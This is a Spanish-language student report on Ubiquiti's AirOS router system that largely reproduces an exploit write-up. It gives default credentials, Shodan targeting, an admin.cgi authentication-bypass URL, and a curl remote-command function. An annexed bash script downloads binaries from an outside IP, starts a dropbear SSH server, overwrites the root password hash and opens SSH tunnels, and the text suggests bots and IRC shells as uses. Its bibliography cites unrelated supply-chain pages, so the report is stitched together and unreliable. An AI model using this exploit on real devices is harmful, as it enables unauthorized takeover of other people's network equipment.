Вы находитесь на странице: 1из 20

ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

AO DEL BUEN SERVICIO AL CIUDADANO

PROMOCIN:

Forjadores de la Paz
TEMA: SISTEMA OPERATIVO AIROS

ASIGNATURA: USO Y MANEJO DE SISTEMA DE


VIDEO-VIGILANCIA

CATEDR: S3 PNP ROMERO TAFUR, Juan Diego

SECCION V

RESPONSABLE: A3 PNP CABREJO SULLON Roberto Carlos

Conviccin

1
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

DEDICATORIA
Dirigimos esta investigacin a nuestras familia, por
ser los seres ms importantes en vida, y ante ello
debemos nuestro forjar y desarrollo profesional

2
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

como miembros de la respetada POLICIA


NACIONAL DEL PERU.

PRESENTACIN

DOCENTE DE LA POLICIA NACIONAL DEL PERU

El presente trabajo de Investigacin ha sido realizado por su alumno. Y


espero que sea para su conocimiento, el cual fue realizado basndose
en textos de biblioteca e internet por lo tanto esperando que el trabajo
presentado colme las expectativas del lector y que sea de su agrado.

3
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

NDICE

Portada 01

Dedicatoria 02

ndice 03

Introduccin 04

Desarrollo del Tema 05

SISTEMA OPERATIVO AIROS

Conclusiones 16

Bibliografa 17

Anexos 18-19

4
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

INTRODUCCION

AirOS de Ubiquiti fue diseado con el objetivo de ser simple pero con mltiples
posibilidades. A diferencia de otros sistemas inalmbricos u otros sistemas Ubiquiti
se basa en un sistema operativo avanzado capaz de manejar un sistema inalmbrico
y con funciones de enrutamiento, pero desarrollado con una interfaz de usuario
simple, limpia e intuitiva.

El objetivo de Ubiquiti es hacer AirOS lo suficientemente simple para que el


operador, cliente o nuevo tcnico lo pueda entender, configurar e implementar
fcilmente.

5
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

SISTEMA OPERATIVO AIROS

Resea Historica
Ubiquiti Networks, Inc., es una compaa estadounidense proveedora de tecnologa
disruptiva para la creacin de redes inalmbricas. Ubiquiti se dedica principalmente
al diseo de hardware de redes inalmbricas, tanto para la comunicacin a largas
distancias, como para el despliegue de
pequeas redes Wi-Fi, priorizando la innovacin
y el alto rendimiento a bajo coste. Sus principales
clientes son proveedores WISP y empresas
dedicadas al despliegue de redes. La empresa
se fund en 2003, y entr formalmente en el
mercado de la tecnologa inalmbrica en junio de
2005.

Qu es un AirOS y que 0day es este?


AirOS es un sistema operativo avanzado, creado
por Ubiquiti, capaz de manejar un sistema
Wireless, enrutamiento y mnimas caractersticas ips y seguridad. Un sistema
operativo para routers que busca la sencillez y la facilidad, siendo muy intuitivo, mas
informacin en: http://www.ubnt.com/.

Hablemo un poco del hardware. Las CPU's de los sistemas AirOS son procesadores
mips (Microprocessor without Interlocked Pipeline Stages). Es una arquitectura que
consume muy pocos recursos y tiene una funcionalidad aceptable. Al ser de
arquitectura distinta a la de los PC's convencionales (generalmente de 32 o 64 bits),
si queremos compilar algo para mips, necesitamos recurrir a la crosscompilacin, es

6
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

decir, compilar un programa/servicio para una arquitectura distinta a la mquina en


la que estamos trabajando. Tras muchas pruebas, recurrimos a Buildroot, una
utilidad de uclib que permite desde compilar el toolchain hasta herramientas tpicas
y bsicas, una imagen de sistema, etc.

Manual de Usuario e instalacin

7
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

8
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

9
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

10
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

11
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

12
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

El 0day afectaba al archivo admin.cgi, el cual es capaz de mostrar el panel Device


Administration Utility que contiene:
o Un Uploader.
o Un Chmod.
o Un Downloader.
o Una Shell.

Imgen del panel login:

Imgen del panel de administracin:

13
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

Explotacin
El usuario y la contrasea por defecto de los AirOS son:
o Usuario: ubnt
o Contrasea: ubnt

Se recomienda usar Shodan para la bsqueda de dispositivos AirOS, pero este tipo
de bsquedas dejan escapar muchos dispositivos. Actualmente trabajamos en un
scanner por rangos de IP para localizar todos.

Se puede observar que el error consiste en cambiar la url de una peticin de login al
cgi; /login.cgi/uri=/ por /admin.cgi/$vuln .
Siendo $vuln cualquiera de los sientes: *.ico *.gif, *.jpg, *.js, *.css,
airview.jar.pack.gz, airview_manager.jnlp, airview.jnlp, airview.uavr.
Por ejemplo: http://IPairos/admin.cgi/lol.css

De esta forma conseguimos el panel de administracin, para muchos el fin, pero esto
es solo el principio.

Postexplotacin
El sistema operativo que lleva montado, por defecto solo tiene permisos de lectura
en la mayora de los directorios del dispositivo. Pero en /etc hay permisos de
escritura, as pues tenemos un /etc/persistent/ a modo de home en el dispositivo. Lo
primero es tener consola root en el dispositivo, para poder tener el control total. A
travs del panel subimos y ejecutamos dropbear mas su respectiva key
crosscompilados.

De esta forma ya hemos conseguido ssh. A partir de aqu, vuestra imaginacin es lo


importante, para ver el potencial de estos dispositivos.

Tras tener funcionales todos los binarios, tenemos un miniserver externo:

14
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

Tenemos un pequeo directorio con un puado de binarios ya crosscompilados y


listos para AirOS disponible en:

http://5.175.223.63/bin/

Y empaquetado en .tar:

http://5.175.223.63/bin.tar

Incluso podramos incluir algunos ms como ngircd (Un pequeo servidor IRC), o lo
que se nos ocurra.

A continuacin, vamos a pasar a automatizar estas tareas. Obviamente no puedo


publicar ms que un par de lineas para deja la imaginacin flotar con bash y curl:

runcmd() { curl -L -H 'Expect: ' -F 'action=cli' -F "exec={ $SYS2$@; } 2>&1"


$host/admin.cgi/lol.css 2>/dev/null | grep 'Execute!' -A 99999 | tail -n +5 | tac | tail -
n +7 | tac; }

Aplicaciones

Algunas de las cosas que se pueden hacer con estos dispositivos son:
o Encadenar AirOS a modo de proxys (SSH Tunneling).
o Shells de IRC.
o Bots.
o Servidor IRC.
o Servidor Web/ftp/etc
o Y muchas otras que podais imaginar.

Automatizacin del proceso


Pasemos a automatizar todo el proceso anterior. Para ello utilizaremos el airosh de
la siguiente manera:

15
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

./airosh IPairos
El script se ejecutar y automticamente comprobar si el dispositivo es vulnerable.
Si es as, proceder a subir Dropbear, y a cambiar las claves de acceso, con
contrasea:lol. De esta forma, habremos conseguido el acceso al dispositivo como
administrador.

16
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

CONCLUSIONES

1. Es un sistema operativo avanzado, con potentes funciones inalmbricas y de


enrrutamiento. Basado en una interfaz simple e intuitiva.

2. AirOS v5.0 permite el mximo rendimiento de la serie M de productos Ubiquiti,


que estn basados en IEEE 802.11n .

3. Es MUY conocida la marca Ubiquity como producto Wireless. Su bajo coste,


adems de lo fcil, rpido y la gran cantidad de funcionalidades que tienen
convierte este tipo de dispositivos en una gran ayuda en el montaje de
infraestructuras Wireless.

17
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

BIBLIOGRAFIA

Fuente
http://www.monografias.com/trabajos94/cadena-suministros-
gestion/cadena-suministros-gestion.shtml#ixzz4Z9ulFUOF

Fuente
http://www.monografias.com/trabajos94/gestion-cadena-de-suministro/gestion-
cadena-de-suministro.shtml#ixzz4Z9vWSrAN

Fuente
http://www.monografias.com/trabajos94/gestion-cadena-de-suministro/gestion-
cadena-de-suministro.shtml#ixzz4ZAIPGpEg

Fuente
http://www.monografias.com/trabajos94/gestion-cadena-de-
suministro/gestioncadena-de-suministro.shtml#ixzz4ZAIhuPaY

Fuente
http://www.monografias.com/trabajos94/gestion-cadena-de-
suministro/gestion-cadena-de-suministro.shtml#ixzz4ZAJ55CH7

Fuente
http://www.monografias.com/trabajos31/cadena-suministros/cadena-
suministros.shtml#ixzz4ZALDeNSy

ANEXOS

#!/bin/bash

18
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

host=$1
portlocal=$2
hostfinal=$3
portfinal=$4
unset c
usage() {
# ./airosh IP
exit 1
}
[[ -z "$host" ]] && c=1
[[ -z "$portlocal" ]] && c=2
[[ -z "$hostfinal" ]] && c=2
[[ -z "$portfinal" ]] && c=2

if [[ $c = 1 ]]; then
echo "FAILED!"
usage
else
echo "OK"
fi
runcmd() { curl -L -H 'Expect: ' -F 'action=cli' -F "exec={ $SYS2$@; }
2>&1" $host/admin.cgi/lol.css 2>/dev/null | grep 'Execute!' -A 99999 |
tail -n +5 | tac | tail -n +7 | tac; }

runcmd 'cd /var/persistent;wget -q http://5.175.223.63/dropbearkey;wget -q


http://5.175.223.63/dropbear;chmod +x dropbearkey dropbear;'
>>/tmp/airos.log

runcmd "[[ -e /var/sshd/lol.rsa ]] || ./dropbearkey -t rsa -f


/var/sshd/lol.rsa" >>/tmp/airos.log

runcmd "./dropbear -b /var/sshd/motd -r /var/sshd/lol.rsa;"


>>/tmp/airos.log

runcmd 'sed -i -e "s/:[^:]*:/:$1$.et5JTtj$6U9j6CSf7g3lNfhFenOX11:/"


/etc/passwd;cat /etc/passwd'

echo -en "| >>user: "


read usr
[[ -z "$usr" ]] && usr=admin

if [[ "$c" = 2 ]]; then


ssh -C "$usr@$host"
else
ssh -g -L "0.0.0.0:$portlocal:$hostfinal:$portfinal" "$usr@$host"
fi
</pre>

19
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP

20

Вам также может понравиться